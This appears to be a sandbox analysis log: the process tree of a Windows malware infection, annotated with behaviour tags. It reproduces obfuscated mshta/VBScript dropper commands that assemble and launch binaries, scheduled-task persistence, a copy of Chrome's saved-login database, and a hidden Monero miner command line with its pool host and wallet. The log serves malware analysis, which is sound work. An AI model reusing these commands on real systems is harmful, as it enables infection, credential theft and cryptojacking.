C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:680
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:5392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:4764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh8017.tmp\tempfile.ps1"15⤵PID:9124
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT15⤵
- Drops file in Program Files directory
PID:7916
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\14liSd8n066ZlJOiSKs7pOPh.exe"C:\Users\Admin\Pictures\Adobe Films\14liSd8n066ZlJOiSKs7pOPh.exe"7⤵PID:5844
-
-
C:\Users\Admin\Pictures\Adobe Films\emLR1yBnJXWqQ4WeiAVEpVDR.exe"C:\Users\Admin\Pictures\Adobe Films\emLR1yBnJXWqQ4WeiAVEpVDR.exe"7⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5900
-
-
C:\Users\Admin\Pictures\Adobe Films\wZ_PDkNwiqJyya1LBzC0Oydj.exe"C:\Users\Admin\Pictures\Adobe Films\wZ_PDkNwiqJyya1LBzC0Oydj.exe"7⤵PID:5656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 6768⤵
- Program crash
PID:6380
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 7288⤵
- Program crash
PID:3344
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BRFaifqDEarEZCox1Bk4206c.exe"C:\Users\Admin\Pictures\Adobe Films\BRFaifqDEarEZCox1Bk4206c.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:5376
-
-
C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"7⤵
- Suspicious use of SetThreadContext
PID:1240 -
C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"C:\Users\Admin\Pictures\Adobe Films\wXD3LoKOrGHMg2o92T34f5b0.exe"8⤵PID:5616
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe5⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exeMon1727c156c4abcec.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2104 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe7⤵
- Executes dropped EXE
PID:1908
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exeC:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1727c156c4abcec.exe7⤵
- Executes dropped EXE
PID:2420
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17332e41e6b.exe5⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17332e41e6b.exeMon17332e41e6b.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2288 -
C:\Users\Admin\AppData\Roaming\5431899.exe"C:\Users\Admin\AppData\Roaming\5431899.exe"7⤵
- Executes dropped EXE
PID:2868
-
-
C:\Users\Admin\AppData\Roaming\520258.exe"C:\Users\Admin\AppData\Roaming\520258.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4380
-
-
C:\Users\Admin\AppData\Roaming\7540508.exe"C:\Users\Admin\AppData\Roaming\7540508.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4636
-
-
C:\Users\Admin\AppData\Roaming\5667762.exe"C:\Users\Admin\AppData\Roaming\5667762.exe"7⤵
- Executes dropped EXE
PID:4880 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\5667762.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\5667762.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )8⤵
- Executes dropped EXE
PID:1908 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\5667762.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\5667762.exe") do taskkill /im "%~nxT" /f9⤵PID:4136
-
C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExELYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj10⤵PID:4436
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""/ptCSVoYGd9AYAP_3p6Sjuyj ""== """" for %T in ( ""C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )11⤵PID:7048
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "/ptCSVoYGd9AYAP_3p6Sjuyj "== "" for %T in ( "C:\Users\Admin\AppData\Local\Temp\LYCw0J.ExE") do taskkill /im "%~nxT" /f12⤵PID:6172
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCrIPt: cLOsE (cREAteoBject ( "wscRIPT.SHELl"). Run ( "C:\Windows\system32\cmd.exe /q /r ECho L%Time%07> 2B_LH.IT & EcHO | SEt /P = ""MZ"" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY +JkOFKWNK.Eo7 + 2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S " ,0 ,TRUe ) )11⤵PID:1512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /q /r ECho L%Time> 2B_LH.IT & EcHO | SEt /P = "MZ" > RqS~WQ.qCt& copY /Y /b RqS~WQ.QCt +WL4sXR.MY+JkOFKWNK.Eo7 +2B_LH.IT BGG1KxA.y & DEl WL4sxR.My JkOFkWNk.EO7 2B_LH.IT RQS~WQ.QCT& stArT regsvr32 .\BgG1KXA.y -U -S12⤵PID:7164
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "13⤵PID:6980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"13⤵
- Executes dropped EXE
PID:4112
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 .\BgG1KXA.y -U -S13⤵
- Loads dropped DLL
PID:7620
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "5667762.exe" /f10⤵
- Kills process with taskkill
PID:6364
-
-
-
-
-
C:\Users\Admin\AppData\Roaming\5952231.exe"C:\Users\Admin\AppData\Roaming\5952231.exe"7⤵
- Executes dropped EXE
PID:2452
-
-
C:\Users\Admin\AppData\Roaming\5824839.exe"C:\Users\Admin\AppData\Roaming\5824839.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5008 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
- Executes dropped EXE
PID:4696
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe5⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon1708beae021a5ff.exeMon1708beae021a5ff.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1652 -
C:\Windows\system32\mspaint.exeC:\Windows\system32\mspaint.exe7⤵PID:4424
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1652 -s 4927⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe5⤵PID:1320
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exeMon174a6c5f1664f.exe6⤵
- Executes dropped EXE
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exeC:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon174a6c5f1664f.exe7⤵
- Executes dropped EXE
PID:1164
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe5⤵PID:1424
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon178d8e5d06822.exeMon178d8e5d06822.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1552 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:4120
-
C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Users\Admin\AppData\Roaming\110301.exe"C:\Users\Admin\AppData\Roaming\110301.exe"9⤵
- Executes dropped EXE
PID:5128
-
-
C:\Users\Admin\AppData\Roaming\3258372.exe"C:\Users\Admin\AppData\Roaming\3258372.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5636
-
-
C:\Users\Admin\AppData\Roaming\8308170.exe"C:\Users\Admin\AppData\Roaming\8308170.exe"9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6024
-
-
C:\Users\Admin\AppData\Roaming\5935917.exe"C:\Users\Admin\AppData\Roaming\5935917.exe"9⤵PID:5796
-
-
C:\Users\Admin\AppData\Roaming\671081.exe"C:\Users\Admin\AppData\Roaming\671081.exe"9⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:4120
-
-
C:\Users\Admin\AppData\Roaming\200556.exe"C:\Users\Admin\AppData\Roaming\200556.exe"9⤵PID:4840
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\200556.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\200556.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )10⤵PID:7016
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\200556.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\200556.exe") do taskkill /im "%~nxT" /f11⤵PID:4340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "200556.exe" /f12⤵
- Kills process with taskkill
PID:4388
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"8⤵
- Executes dropped EXE
PID:4568
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵PID:5624
-
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"8⤵
- Executes dropped EXE
PID:4704
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"8⤵
- Executes dropped EXE
PID:2392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 7929⤵
- Program crash
PID:4872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 8089⤵
- Program crash
PID:3896
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 7929⤵
- Program crash
PID:7028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 8049⤵
- Program crash
PID:4484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 9289⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5540
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"8⤵
- Executes dropped EXE
PID:3080 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:4564
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:5448
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi11⤵PID:6260
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )12⤵PID:6920
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"13⤵PID:5016
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )12⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:4588 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC13⤵PID:7228
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "14⤵PID:8052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"14⤵PID:4484
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC14⤵
- Loads dropped DLL
PID:2200
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"11⤵
- Kills process with taskkill
PID:5600
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"8⤵PID:4604
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"8⤵PID:4844
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
PID:4724
-
-
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1560 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"9⤵PID:6420
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:3816
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵
- Creates scheduled task(s)
PID:5592
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵PID:7836
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:5368
-
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe11⤵PID:7164
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"12⤵
- Suspicious use of SetThreadContext
PID:9076 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"13⤵PID:8632
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"14⤵PID:8440
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth13⤵PID:4804
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe5⤵PID:1776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17afe24e0084db3.exe5⤵PID:1076
-
-
-
-
-
C:\Windows\SysWOW64\cscript.exe"C:\Windows\SysWOW64\cscript.exe"2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- System policy modification
PID:6072 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\pQnAbYmg3ChB2IJbQyaavv5U.exe"3⤵PID:4948
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V3⤵PID:7388
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"3⤵PID:5656
-
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\SysWOW64\svchost.exe"2⤵PID:5896
-
-
C:\Program Files (x86)\X_r3\ms9r_l_r.exe"C:\Program Files (x86)\X_r3\ms9r_l_r.exe"2⤵PID:7596
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2520
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1328
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1148
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1092
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:892 -
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵PID:7288
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7604
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6660
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll",IuWtIecd2⤵
- Windows security modification
- Checks whether UAC is enabled
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7072
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5400
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7604
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7208
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8444
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:8396
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 80802⤵PID:9028
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 80802⤵PID:8520
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 80802⤵PID:3504
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 80802⤵PID:7100
-
-
C:\Users\Admin\AppData\Roaming\bwgirdwC:\Users\Admin\AppData\Roaming\bwgirdw2⤵PID:8188
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 80802⤵PID:7664
-
-
C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe"C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 80802⤵PID:6412
-
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe "C:\Program Files (x86)\IuWtIecd\IuWtIecd.dll",IuWtIecd2⤵
- Windows security modification
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5348
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17a0d8ec302e.exeMon17a0d8ec302e.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2300
-
C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe"C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon17afe24e0084db3.exe" -u1⤵
- Executes dropped EXE
PID:2924
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBscRipT: ClOSe( crEatEobJECt ("wSCRIPT.SHEll" ).rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCB23D1E5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))1⤵PID:1692
-
